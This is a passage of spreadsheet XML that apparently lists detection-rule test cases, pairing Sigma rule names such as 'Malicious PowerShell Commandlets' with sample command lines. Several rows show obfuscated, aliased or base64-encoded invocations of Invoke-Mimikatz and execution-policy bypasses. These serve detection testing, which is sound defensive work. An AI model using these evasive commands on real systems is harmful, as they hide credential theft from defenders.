      <c r="J522" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K522" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="523" ht="15.75" customHeight="1" s="42">
      <c r="A523" s="43" t="n"/>
      <c r="B523" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C523" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D523" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E523" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F523" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G523" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H523" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I523" s="44" t="n"/>
      <c r="J523" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K523" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="524" ht="15.75" customHeight="1" s="42">
      <c r="A524" s="43" t="n"/>
      <c r="B524" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C524" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D524" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E524" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F524" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G524" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H524" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I524" s="44" t="n"/>
      <c r="J524" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K524" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="525" ht="15.75" customHeight="1" s="42">
      <c r="A525" s="43" t="n"/>
      <c r="B525" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C525" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D525" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E525" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F525" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G525" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H525" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I525" s="43" t="n"/>
      <c r="J525" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K525" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="526" ht="15.75" customHeight="1" s="42">
      <c r="A526" s="43" t="n"/>
      <c r="B526" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C526" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D526" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E526" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F526" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G526" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H526" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I526" s="44" t="n"/>
      <c r="J526" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K526" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="527" ht="15.75" customHeight="1" s="42">
      <c r="A527" s="43" t="n"/>
      <c r="B527" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C527" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D527" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E527" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodeDcommANd SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F527" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G527" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H527" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I527" s="44" t="n"/>
      <c r="J527" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K527" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="528" ht="15.75" customHeight="1" s="42">
      <c r="A528" s="43" t="n"/>
      <c r="B528" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C528" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D528" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E528" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F528" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G528" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H528" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I528" s="44" t="n"/>
      <c r="J528" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K528" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="529" ht="15.75" customHeight="1" s="42">
      <c r="A529" s="43" t="n"/>
      <c r="B529" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C529" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D529" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E529" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F529" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G529" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H529" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I529" s="43" t="n"/>
      <c r="J529" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K529" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="530" ht="15.75" customHeight="1" s="42">
      <c r="A530" s="43" t="n"/>
      <c r="B530" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C530" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D530" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E530" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F530" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G530" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H530" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I530" s="43" t="n"/>
      <c r="J530" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K530" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="531" ht="15.75" customHeight="1" s="42">
      <c r="A531" s="43" t="n"/>
      <c r="B531" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C531" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D531" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E531" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F531" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G531" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H531" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I531" s="43" t="n"/>
      <c r="J531" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K531" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="532" ht="15.75" customHeight="1" s="42">
      <c r="A532" s="43" t="n"/>
      <c r="B532" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C532" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D532" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E532" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F532" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G532" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H532" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I532" s="43" t="n"/>
      <c r="J532" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K532" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="533" ht="15.75" customHeight="1" s="42">
      <c r="A533" s="43" t="n"/>
      <c r="B533" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C533" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D533" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E533" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F533" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G533" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H533" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I533" s="43" t="n"/>
      <c r="J533" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K533" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="534" ht="15.75" customHeight="1" s="42">
      <c r="A534" s="43" t="n"/>
      <c r="B534" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C534" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D534" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E534" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F534" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G534" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H534" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I534" s="43" t="n"/>
      <c r="J534" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K534" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="535" ht="15.75" customHeight="1" s="42">
      <c r="A535" s="43" t="n"/>
      <c r="B535" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C535" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D535" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E535" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F535" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G535" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H535" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I535" s="43" t="n"/>
      <c r="J535" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K535" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="536" ht="15.75" customHeight="1" s="42">
      <c r="A536" s="43" t="n"/>
      <c r="B536" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C536" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D536" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E536" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F536" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G536" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H536" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I536" s="43" t="n"/>
      <c r="J536" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K536" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="537" ht="15.75" customHeight="1" s="42">
      <c r="A537" s="43" t="n"/>
      <c r="B537" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C537" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D537" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E537" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F537" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G537" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H537" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I537" s="43" t="n"/>
      <c r="J537" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K537" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="538" ht="15.75" customHeight="1" s="42">
      <c r="A538" s="43" t="n"/>
      <c r="B538" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C538" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D538" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E538" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F538" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G538" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H538" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I538" s="43" t="n"/>
      <c r="J538" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K538" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="539" ht="15.75" customHeight="1" s="42">
      <c r="A539" s="43" t="n"/>
      <c r="B539" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C539" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D539" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E539" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F539" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G539" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H539" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I539" s="43" t="n"/>
      <c r="J539" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K539" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="540" ht="15.75" customHeight="1" s="42">
      <c r="A540" s="43" t="n"/>
      <c r="B540" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C540" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D540" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E540" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F540" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G540" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H540" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I540" s="43" t="n"/>
      <c r="J540" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K540" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="541" ht="15.75" customHeight="1" s="42">
      <c r="A541" s="43" t="n"/>
      <c r="B541" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C541" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D541" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E541" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; 'C:\Users\Public\script.ps1'"</t>
        </is>
      </c>
      <c r="F541" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G541" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H541" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I541" s="43" t="n"/>
      <c r="J541" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K541" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="542" ht="15.75" customHeight="1" s="42">
      <c r="A542" s="43" t="n"/>
      <c r="B542" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C542" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D542" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E542" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"f" "C:\Users" "\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F542" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G542" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H542" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I542" s="44" t="n"/>
      <c r="J542" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K542" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="543" ht="15.75" customHeight="1" s="42">
      <c r="A543" s="43" t="n"/>
      <c r="B543" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C543" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D543" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E543" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Ep bypass -"f" "C:\Users" "\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F543" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G543" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H543" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I543" s="43" t="n"/>
      <c r="J543" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K543" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="544" ht="15.75" customHeight="1" s="42">
      <c r="A544" s="43" t="n"/>
      <c r="B544" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C544" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D544" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E544" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ep" bypass -"f" "C:\Users" "\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F544" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G544" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H544" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I544" s="44" t="n"/>
      <c r="J544" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K544" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="545" ht="15.75" customHeight="1" s="42">
      <c r="A545" s="43" t="n"/>
      <c r="B545" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C545" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D545" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E545" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ep" bypass -f "C:\Users" "\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F545" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G545" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H545" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I545" s="44" t="n"/>
      <c r="J545" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K545" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="546" ht="15.75" customHeight="1" s="42">
      <c r="A546" s="43" t="n"/>
      <c r="B546" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C546" s="44" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D546" s="44" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E546" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"file" "C:\Users\Default\..\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F546" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G546" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H546" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I546" s="43" t="n"/>
      <c r="J546" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K546" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="547" ht="15.75" customHeight="1" s="42">
      <c r="A547" s="43" t="n"/>
      <c r="B547" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C547" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D547" s="44" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E547" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ex" Bypass -f script.ps1</t>
        </is>
      </c>
      <c r="F547" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G547" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H547" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I547" s="44" t="n"/>
      <c r="J547" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K547" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="548" ht="15.75" customHeight="1" s="42">
      <c r="A548" s="43" t="n"/>
      <c r="B548" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C548" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D548" s="44" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E548" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ex Bypass /"File" script.ps1</t>
        </is>
      </c>
      <c r="F548" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G548" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H548" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I548" s="44" t="n"/>
      <c r="J548" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K548" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="549" ht="15.75" customHeight="1" s="42">
      <c r="A549" s="43" t="n"/>
      <c r="B549" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C549" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D549" s="44" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E549" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ex" Bypass -fIlE script.ps1</t>
        </is>
      </c>
      <c r="F549" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G549" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H549" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I549" s="44" t="n"/>
      <c r="J549" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K549" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="550" ht="15.75" customHeight="1" s="42">
      <c r="A550" s="43" t="n"/>
      <c r="B550" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C550" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D550" s="44" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E550" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ex Bypass -"File" script.ps1</t>
        </is>
      </c>
      <c r="F550" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G550" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H550" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I550" s="43" t="n"/>
      <c r="J550" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K550" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="551" ht="15.75" customHeight="1" s="42">
      <c r="A551" s="43" t="n"/>
      <c r="B551" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C551" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D551" s="44" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E551" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ex" Bypass -FilE script.ps1</t>
        </is>
      </c>
      <c r="F551" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G551" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H551" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I551" s="44" t="n"/>
      <c r="J551" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K551" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="552" ht="15.75" customHeight="1" s="42">
      <c r="A552" s="43" t="n"/>
      <c r="B552" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C552" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D552" s="44" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E552" s="44" t="inlineStr">
